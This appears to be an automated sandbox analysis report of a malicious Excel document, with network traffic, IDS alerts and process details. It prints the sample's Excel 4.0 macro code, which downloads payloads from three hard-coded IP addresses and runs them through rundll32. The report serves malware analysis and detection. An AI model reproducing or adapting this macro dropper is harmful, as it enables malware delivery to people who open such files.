Data Raw: | 01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 39 03 00 00 00 00 00 00 01 00 00 00 d2 b3 f3 e4 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
Macro 4.0 Code |
---|
"=EXEC(""rundll32 ""&""..\Hodas.vyur1""&"",PluginInit"")"=GOTO(Hi!D4)
,=NOW(),,,"=NOW()=NOW()=NOW()=FORMULA(""URLDownloadToFileA"",CE271)",,"=CONCATENATE(CC274,CD266,CC273)",,,"=CONCATENATE(CC275,CD266,CC273)","=NOW()=NOW()=NOW()=REGISTER(CE270,CE271,CE269,CE273,,1,9)",JJCCJJ,"=CONCATENATE(CC276,CD266,CC273)","=NOW()=NOW()=NOW()=REGISTER(CE270,CE271,CE272,CE273,,1,9)",uRlMon,,"=NOW()=NOW()=NOW()=Belandes(0,CC268,""..\Hodas.vyur"",0,0)",,,"=NOW()=NOW()=NOW()=Belandes(0,CC269,""..\Hodas.vyur1"",0,0)",JJCCBB,"="".dat""","=NOW()=NOW()=NOW()=Belandes(0,CC270,""..\Hodas.vyur2"",0,0)",Belandes,"=""http://45.150.67.243/""",,,"=""http://195.123.210.186/""",,,"=""http://91.211.89.28/""",,,,,,,,,,,,,"=NOW()=NOW()=NOW()=EXEC(""rundll32 ""&""..\Hodas.vyur""&"",PluginInit"")",,,,,,,,,=GOTO(Jo!E4),,
"=EXEC(""rundll32 ""&""..\Hodas.vyur2""&"",PluginInit"")"=HALT()
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
04/01/21-21:53:43.033536 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49167 | 45.150.67.243 | 192.168.2.22 |
04/01/21-21:53:43.253017 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49168 | 195.123.210.186 | 192.168.2.22 |
04/01/21-21:53:43.514905 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49169 | 91.211.89.28 | 192.168.2.22 |
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 1, 2021 21:53:42.614259958 CEST | 49167 | 80 | 192.168.2.22 | 45.150.67.243 |
Apr 1, 2021 21:53:42.726013899 CEST | 80 | 49167 | 45.150.67.243 | 192.168.2.22 |
Apr 1, 2021 21:53:42.726177931 CEST | 49167 | 80 | 192.168.2.22 | 45.150.67.243 |
Apr 1, 2021 21:53:42.738524914 CEST | 49167 | 80 | 192.168.2.22 | 45.150.67.243 |
Apr 1, 2021 21:53:42.832783937 CEST | 80 | 49167 | 45.150.67.243 | 192.168.2.22 |
Apr 1, 2021 21:53:43.033535957 CEST | 80 | 49167 | 45.150.67.243 | 192.168.2.22 |
Apr 1, 2021 21:53:43.033732891 CEST | 49167 | 80 | 192.168.2.22 | 45.150.67.243 |
Apr 1, 2021 21:53:43.055102110 CEST | 49168 | 80 | 192.168.2.22 | 195.123.210.186 |
Apr 1, 2021 21:53:43.122000933 CEST | 80 | 49168 | 195.123.210.186 | 192.168.2.22 |
Apr 1, 2021 21:53:43.122169971 CEST | 49168 | 80 | 192.168.2.22 | 195.123.210.186 |
Apr 1, 2021 21:53:43.123534918 CEST | 49168 | 80 | 192.168.2.22 | 195.123.210.186 |
Apr 1, 2021 21:53:43.188724995 CEST | 80 | 49168 | 195.123.210.186 | 192.168.2.22 |
Apr 1, 2021 21:53:43.253016949 CEST | 80 | 49168 | 195.123.210.186 | 192.168.2.22 |
Apr 1, 2021 21:53:43.253165007 CEST | 49168 | 80 | 192.168.2.22 | 195.123.210.186 |
Apr 1, 2021 21:53:43.279544115 CEST | 49169 | 80 | 192.168.2.22 | 91.211.89.28 |
Apr 1, 2021 21:53:43.362888098 CEST | 80 | 49169 | 91.211.89.28 | 192.168.2.22 |
Apr 1, 2021 21:53:43.363066912 CEST | 49169 | 80 | 192.168.2.22 | 91.211.89.28 |
Apr 1, 2021 21:53:43.364522934 CEST | 49169 | 80 | 192.168.2.22 | 91.211.89.28 |
Apr 1, 2021 21:53:43.448395967 CEST | 80 | 49169 | 91.211.89.28 | 192.168.2.22 |
Apr 1, 2021 21:53:43.514904976 CEST | 80 | 49169 | 91.211.89.28 | 192.168.2.22 |
Apr 1, 2021 21:53:43.515085936 CEST | 49169 | 80 | 192.168.2.22 | 91.211.89.28 |
Apr 1, 2021 21:54:48.033828974 CEST | 80 | 49167 | 45.150.67.243 | 192.168.2.22 |
Apr 1, 2021 21:54:48.036288023 CEST | 49167 | 80 | 192.168.2.22 | 45.150.67.243 |
Apr 1, 2021 21:54:48.252974033 CEST | 80 | 49168 | 195.123.210.186 | 192.168.2.22 |
Apr 1, 2021 21:54:48.254398108 CEST | 49168 | 80 | 192.168.2.22 | 195.123.210.186 |
Apr 1, 2021 21:54:48.514592886 CEST | 80 | 49169 | 91.211.89.28 | 192.168.2.22 |
Apr 1, 2021 21:54:48.518407106 CEST | 49169 | 80 | 192.168.2.22 | 91.211.89.28 |
Apr 1, 2021 21:55:42.564728022 CEST | 49169 | 80 | 192.168.2.22 | 91.211.89.28 |
Apr 1, 2021 21:55:42.565167904 CEST | 49168 | 80 | 192.168.2.22 | 195.123.210.186 |
Apr 1, 2021 21:55:42.565632105 CEST | 49167 | 80 | 192.168.2.22 | 45.150.67.243 |
Apr 1, 2021 21:55:42.630917072 CEST | 80 | 49168 | 195.123.210.186 | 192.168.2.22 |
Apr 1, 2021 21:55:42.647641897 CEST | 80 | 49169 | 91.211.89.28 | 192.168.2.22 |
Apr 1, 2021 21:55:42.660893917 CEST | 80 | 49167 | 45.150.67.243 | 192.168.2.22 |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49167 | 45.150.67.243 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 1, 2021 21:53:42.738524914 CEST | 0 | OUT | |
Apr 1, 2021 21:53:43.033535957 CEST | 1 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.22 | 49168 | 195.123.210.186 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 1, 2021 21:53:43.123534918 CEST | 1 | OUT | |
Apr 1, 2021 21:53:43.253016949 CEST | 2 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
2 | 192.168.2.22 | 49169 | 91.211.89.28 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 1, 2021 21:53:43.364522934 CEST | 3 | OUT | |
Apr 1, 2021 21:53:43.514904976 CEST | 4 | IN |
Code Manipulations |
---|
Statistics |
---|
Behavior |
---|
Click to jump to process
System Behavior |
---|
General |
---|
Start time: | 21:53:35 |
Start date: | 01/04/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f4c0000 |
File size: | 27641504 bytes |
MD5 hash: | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 21:53:39 |
Start date: | 01/04/2021 |
Path: | C:\Windows\System32\rundll32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xffa80000 |
File size: | 45568 bytes |
MD5 hash: | DD81D91FF3B0763C392422865C9AC12E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 21:53:40 |
Start date: | 01/04/2021 |
Path: | C:\Windows\System32\rundll32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xffa80000 |
File size: | 45568 bytes |
MD5 hash: | DD81D91FF3B0763C392422865C9AC12E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 21:53:40 |
Start date: | 01/04/2021 |
Path: | C:\Windows\System32\rundll32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xffa80000 |
File size: | 45568 bytes |
MD5 hash: | DD81D91FF3B0763C392422865C9AC12E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|
Code Analysis |
---|